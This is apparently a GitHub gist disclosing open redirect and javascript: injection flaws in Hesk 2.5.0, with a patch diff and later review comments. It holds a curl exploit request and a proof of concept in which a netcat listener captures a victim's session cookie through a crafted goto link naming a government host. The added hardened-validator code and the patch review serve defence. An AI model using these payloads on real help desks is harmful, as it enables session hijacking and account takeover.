@cedriczirtacic
Last active August 29, 2015 14:04
Hesk 2.5.0 URL Redirection
HTTP/1.1 200 OK
Server: test
Content-Type: text/html; charset=UTF-8
Date: Tue, 05 Aug 2014 14:42:52 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 13
<h1>TEST</h1>
Basically it is the same bug, but there is more than one way to exploit it.
There is a positive side to this: both of these proof-of-concepts are difficult to exploit because of how it is coded and because of browser-side protections.
I will make more tests, but this is what I have found so far.
(#) JavaScript Injection via CWE-601 (CWE-89):
http://www.website.com/admin/index.php?goto=javascript:alert(0)
(#) Response:
[root@server www]# curl -v 'http://www.website.com/admin/index.php' -H 'Content-Type: application/x-www-form-urlencoded' --data 'user=test&pass=test123&remember_user=NOTHANKS&a=do_login&goto=javascript%3Aalert%280%29' --compressed
* About to connect() to www.website.com port 80
* Trying 10.73.2.4... connected
* Connected to www.website.com (10.73.2.4) port 80
> POST /admin/index.php HTTP/1.1
> User-Agent: curl/7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5
> Host: www.website.com
> Accept: */*
> Accept-Encoding: deflate, gzip
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 89
>
> user=test&pass=test123&remember_user=NOTHANKS&a=do_login&goto=javascript%3Aalert%280%29
< HTTP/1.1 302 Found
< Date: Tue, 05 Aug 2014 15:23:48 GMT
< Server: Apache/2.2.3 (Red Hat)
< Set-Cookie: HESK356d9b08ff9c3b97982cf1917a8b4aae84a6ad0f=i2llpc6hd2hkksbbr4qttr5n86; path=/
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
< Pragma: no-cache
< P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
< Set-Cookie: HESK356d9b08ff9c3b97982cf1917a8b4aae84a6ad0f=pq6k294tm4u93n9gfvn5gm0in7; path=/
< Set-Cookie: hesk_username=deleted; expires=Mon, 05-Aug-2013 15:23:47 GMT
< Set-Cookie: hesk_p=deleted; expires=Mon, 05-Aug-2013 15:23:47 GMT
< Location: javascript:alert(0)
< Content-Length: 153
< Connection: close
< Content-Type: text/html; charset=UTF-8
(#) URL Redirection (CWE-601):
This one is more difficult to exploit because it relies on what you have set as $hesk_settings['hesk_url'].
Let's say a user has gained access to the server, or can execute a command there as any user (it does not have to be the super user). He can then use the same _goto_ parameter to control the response and/or obtain the request header (including the cookie value) and gain the user's access:
(#) Proof-Of-Concept:
(1) The attacker creates a "server" listening on port 1337 with a response inside the "attack" file:
[root@server www]# nc -l 1337 -v < attack
(2) Sends the user the link: http://prehesk.hacienda-gcba.gov.ar/admin/index.php?goto=http://prehesk.hacienda-gcba.gov.ar:1337
(3.1) The attacker receives the request header with the user's data:
[root@server www]# nc -l 1337 -v < attack
Connection from 10.73.10.217 port 1337 [tcp/menandmice-dns] accepted
GET / HTTP/1.1
Host: www.website.com:1337
Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.72 Safari/537.36
Referer: http://www.website.com/admin/index.php?goto=http://www.website.com:1337
Accept-Encoding: gzip,deflate,sdch
Accept-Language: es-419,es;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: HESK356d9b08ff9c3b97982cf1917a8b4aae84a6ad0f=ausbcabgb32v3b6s0bg3pk3071
(3.2) The user receives the special response written by the attacker. It can also contain HTML/JavaScript code or another "Location" header to redirect the user to yet another server.
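To make the two findings above concrete from the defender's side, here is an added Python illustration (not code from the gist and not Hesk's own code) that re-implements the pre-patch host-only comparison beside a stricter redirect-target validator, and runs both over the same goto values the write-up uses. HESK_URL and SAFE_DEFAULT are constructed stand-ins for $hesk_settings['hesk_url'] and the admin_main.php fallback; the function names are mine.

```python
from urllib.parse import urlparse

# Constructed stand-in for $hesk_settings['hesk_url']; not a real deployment.
HESK_URL = "http://www.website.com/hesk"
# Where Hesk falls back to when the goto target is rejected.
SAFE_DEFAULT = "admin_main.php"
ALLOWED_SCHEMES = {"http", "https"}


def _site_host(hostname):
    """Normalise a hostname the way the Hesk check does: lower-case, drop 'www.'."""
    return (hostname or "").lower().replace("www.", "", 1)


def weak_redirect_target(goto, hesk_url=HESK_URL):
    """Pre-patch logic: only the hostnames are compared, and only when both
    URLs have one. A target with no host at all (javascript:...) and a
    same-host target on a different port both pass straight through."""
    my, g = urlparse(hesk_url), urlparse(goto)
    if my.hostname and g.hostname and _site_host(my.hostname) != _site_host(g.hostname):
        return SAFE_DEFAULT
    return goto


def safe_redirect_target(goto, hesk_url=HESK_URL):
    """Hardened validator. Accepts either a plain relative path or an absolute
    http(s) URL whose host and explicit port match the configured site.
    Everything else (javascript:/data: schemes, other ports, protocol-relative
    //host, embedded credentials, unparsable ports, control characters) falls
    back to SAFE_DEFAULT."""
    # Reject empty values and anything containing whitespace or control
    # characters; browsers and URL parsers disagree on how to strip them.
    if not goto or any(ord(c) <= 0x20 or ord(c) == 0x7F for c in goto):
        return SAFE_DEFAULT
    my, g = urlparse(hesk_url), urlparse(goto)

    # 1. Relative path: no scheme, no authority, and not starting with a slash
    #    or backslash (browsers read "//host" and "/\host" as a new authority).
    if not g.scheme and not g.netloc:
        return goto if goto[0] not in "/\\" else SAFE_DEFAULT

    # 2. Absolute URL: must be http(s), carry no user:pass@, and point at the
    #    configured host with the same explicit port (None == None is fine).
    if g.scheme not in ALLOWED_SCHEMES:
        return SAFE_DEFAULT
    try:
        goto_port = g.port  # raises ValueError for a non-numeric port
    except ValueError:
        return SAFE_DEFAULT
    if g.username is not None or g.password is not None:
        return SAFE_DEFAULT
    if _site_host(g.hostname) != _site_host(my.hostname) or goto_port != my.port:
        return SAFE_DEFAULT
    return goto


if __name__ == "__main__":
    # Constructed samples: the two values from the write-up plus common variants.
    for sample in ("javascript:alert(0)", "http://www.website.com:1337",
                   "//evil.example/", "admin_main.php?x=1",
                   "https://website.com/hesk/admin/"):
        print(f"{sample!r:40} weak -> {weak_redirect_target(sample)!r:32} "
              f"safe -> {safe_redirect_target(sample)!r}")
```

The pre-patch function reproduces both findings: the javascript: value never has a host, so the comparison is skipped and it is echoed into Location; the :1337 value has the right host, so the port is never looked at. The stricter function treats "same site" as scheme, host and port together, and treats anything that is not a bare relative path as an absolute URL that must pass every check.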
--- index.php.old 2014-08-05 14:22:30.000000000 -0300
+++ index.php 2014-08-05 14:28:08.000000000 -0300
@@ -239,7 +239,8 @@
if (isset($myurl['host']) && isset($goto['host']))
{
- if ( str_replace('www.','',strtolower($myurl['host'])) != str_replace('www.','',strtolower($goto['host'])) )
+ if ( str_replace('www.','',strtolower($myurl['host'])) != str_replace('www.','',strtolower($goto['host'])) || isset($goto['port'])
+ || (isset($goto['scheme']) && !preg_match('/^https*$/', $goto['scheme'])) )
{
$url = 'admin_main.php';
}
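Review bot: the new scheme test `preg_match('/^https*$/', $goto['scheme'])` matches "http" followed by any number of "s" characters (so "httpss" passes) and is case-sensitive; `/^https?$/i` expresses the intent. A second point: both added conditions sit inside `if (isset($myurl['host']) && isset($goto['host']))`, so a goto value that parse_url() returns without a host component, which is exactly the `javascript:alert(0)` case described above (scheme plus path, no host), never reaches the port or scheme check. Whatever code handles the no-host branch outside this hunk needs the same scheme restriction, or the fallback to `$url = 'admin_main.php';` should apply whenever `$goto['host']` is missing but `$goto['scheme']` is set.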